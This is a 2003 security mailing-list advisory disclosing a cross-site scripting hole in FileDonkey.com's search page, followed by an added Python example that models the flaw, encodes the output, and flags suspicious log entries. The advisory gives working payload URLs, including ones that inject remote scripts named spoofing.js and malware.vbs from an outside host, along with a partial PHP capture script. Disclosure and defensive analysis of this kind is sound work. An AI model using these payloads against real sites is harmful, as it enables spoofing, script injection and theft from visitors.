Date: Sun, 12 Oct 2003 18:49:59 +0200
From: "Lorenzo Hernandez Garcia-Hierro" <lorenzohgh@...g-security.com>
To: "Full-Disclosure" <full-disclosure@...ts.netsys.com>
Cc: "BUGTRAQ" <bugtraq@...urityfocus.com>, <webmaster@...edonkey.com>
Subject: FileDonkey.com Cross Site Scripting

FileDonkey.com Cross Site Scripting
------

WEBSITE: File Donkey
DOMAIN: www.filedonkey.com
RISK: 7
OWNERS STATUS: webmaster@...edonkey.com [ warned same time as security lists ]

---------------------
--- DESCRIPTION ---
---------------------

FileDonkey.com is the only web search engine supported by P2P clients like eMule, xMule, etc. FileDonkey is a worldwide used website for finding the files that you want in the eDonkey networks (P2P).

---------------------------------------------
|SECURITY HOLES FOUND and PROOFS OF CONCEPT:|
---------------------------------------------

I was making some tests in the FileDonkey website but I didn't remember the search engine. Search engines are the first systems affected by Cross Site Scripting holes because, normally, they have insufficient input validation control and they produce output (search results) without checking for dangerous code; this can be exploited easily with some lines of PHP code and a little knowledge of PHP and JavaScript.

---------------------------------------------
| CROSS SITE SCRIPTING HOLES FOUND |
---------------------------------------------

Located in the search engine, currently using a script with HTML extension, search.html. This script basically uses 5 variables:

pattern=[KEYWORDS]
min_size=[FILE MIN SIZE]
max_size=[FILE MAX SIZE]
scope=[FILE TYPE]
submit=[YOUR SUBMIT BUTTON CODE]

But only one is needed: pattern=

You must include the keywords for the wanted file, and, walla! If the file is available, it provides you a nice list of results (ed2k links). The keywords sent will be shown in (if there are no available files):

No files found for pattern 'NoSecureRootGroupSecurityResearch'.

Ok, it seems not vulnerable but, wait a moment, the keywords are in the form field, and, we know that a form field always ends with a ">, let's try! ..... We send the request in POST mode... Or use this URL:

http://www.filedonkey.com/search.html?pattern="><script>alert('xD .- Shields Down ! -. xD');</script>

And we get...

-----JavaScript Application-----
|                              |
| xD .- Shields Down ! -. xD   |
|                              |
|------------------------------|

The script was successfully executed on the client side. Fantastic for attackers (not me ;-). We can try more things, and, of course, my loved PHP performance:

.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.
| CODE FOR THE COMMON XSS TESTING TASKS |
.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.

/\ cut from here /\
<?php
// ----------------------------------
// XSS TESTING SCRIPT
// NO SECURE ROOT GROUP SECURITY RESEARCH
// BY LORENZO HERNANDEZ GARCIA-HIERRO
// * NOT FULL VERSION *
// ----------------------------------
$domain = "FileDonkey.com/Other";
$member = "Lorenzo Hernandez Garcia-Hierro";
// where the browser came from and what it sent in the URL
$referer = getenv("HTTP_REFERER");
$data = getenv("QUERY_STRING");
// this trimmed version only strips the tags and echoes the rest back
$xss = strip_tags($data);
echo "$xss";
?>
/\ xss-testing.php END ! /\

Please note that I removed lots of lines of the code to prevent bad uses of this. A full version is running under http://test-zone.nsrg-security.com/xss/?XSS_TEST it has

-- THE REAL EXPLOITATION --

Now we start to exploit the XSS hole:

*-. Possible attacks:
1.- Including malicious scripts to execute them on the client side.
2.- Try to steal cookie data (no cookies are given in FileDonkey)
3.- Try to connect to malicious sites through the Microsoft.XMLHTTP.
4.- Try to use known vulnerabilities to steal other domains' data.

SOME PROOFS OF CONCEPT:
________________________

A script that I developed to change some web page stuff (spoofing):
http://www.filedonkey.com/search.html?pattern="><script%20src=http://test-zone.nsrg-security.com/xss/spoofing.js></script>

A Georgi Guninski script (shows a blue screen that spoofs the whole screen):
http://www.filedonkey.com/search.html?pattern="><script%20src=http://test-zone.nsrg-security.com/xss/blue.js></script>

Replace the Windows Media Player executable with a non dangerous file that shows a dialog with some nice stuff of the NSRGroup:
http://www.filedonkey.com/search.html?pattern="><script%20src=http://test-zone.nsrg-security.com/xss/malware.vbs></script>

The XSS standard testing script (NSRGroup XSS-TST-STANDARD):
http://test-zone.nsrg-security.com/xss/?XSS-TST-STANDARD

*//*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/
* REFERENCES -> ONLINE
/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/
http://advisories.nsrg-security.com/FileDonkey.com-XSS

-----------
| CONTACT |
-----------
-------------------------------
0x00->Lorenzo Hernandez Garcia-Hierro
0x01->Security Consultant
__________________________________
PGP: Keyfingerprint B6D7 5FCC 78B4 97C1 4010 56BC 0E5F 2AB2 ID: 0x9C38E1D7
**********************************
No Secure Root Group Security Research Team
http://www.nsrg-security.com
______________________

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
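As an added example, not part of the original post or of FileDonkey's code, the following Python models the reflection the advisory describes: the pattern= keyword echoed inside the form field's value attribute and in the "No files found" message, the attribute breakout that a leading "> causes, the contextual encoding that closes it, and a log-triage check a site operator could run over access logs. The TEMPLATE markup and the SAMPLE_LOG lines are constructed stand-ins, not captured from the real site.

```python
import html
from urllib.parse import unquote_plus, urlsplit

# Constructed stand-in for the search page markup the advisory describes:
# the keyword is reflected inside the input's value attribute and again in
# the "No files found for pattern '...'" message.
TEMPLATE = (
    '<form action="search.html"><input type="text" name="pattern" '
    'value="{pattern}"></form>'
    "<p>No files found for pattern '{pattern}'.</p>"
)

# Constructed access-log sample (common log format), not real FileDonkey traffic.
SAMPLE_LOG = [
    '10.0.0.1 - - [12/Oct/2003:18:49:59 +0200] "GET /search.html?pattern=linux+iso HTTP/1.0" 200 812',
    '10.0.0.2 - - [12/Oct/2003:18:50:03 +0200] "GET /search.html?pattern=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.0" 200 512',
    '10.0.0.3 - - [12/Oct/2003:18:50:10 +0200] "GET /index.html HTTP/1.0" 200 2048',
]

def pattern_from_url(url: str) -> str:
    """Extract and URL-decode the pattern= parameter as the server sees it."""
    for part in urlsplit(url).query.split("&"):
        key, _, value = part.partition("=")
        if key == "pattern":
            return unquote_plus(value)
    return ""

def render_vulnerable(pattern: str) -> str:
    """Reflect the raw keyword: a leading "> closes the value attribute early."""
    return TEMPLATE.format(pattern=pattern)

def render_fixed(pattern: str) -> str:
    """Encode & < > " ' before reflecting, so the keyword stays data in both
    the attribute and the text context instead of being parsed as markup."""
    return TEMPLATE.format(pattern=html.escape(pattern, quote=True))

def reflected_unencoded(page: str, payload: str) -> bool:
    """True when the payload reaches the page verbatim, i.e. as live markup."""
    return payload in page

def flag_suspicious_requests(log_lines):
    """Triage for operators: request paths whose decoded pattern= value
    carries markup characters a keyword search never needs."""
    hits = []
    for line in log_lines:
        try:
            path = line.split('"')[1].split(" ")[1]
        except IndexError:
            continue
        value = pattern_from_url("http://host" + path)
        if any(c in value for c in '<>"'):
            hits.append(path)
    return hits
```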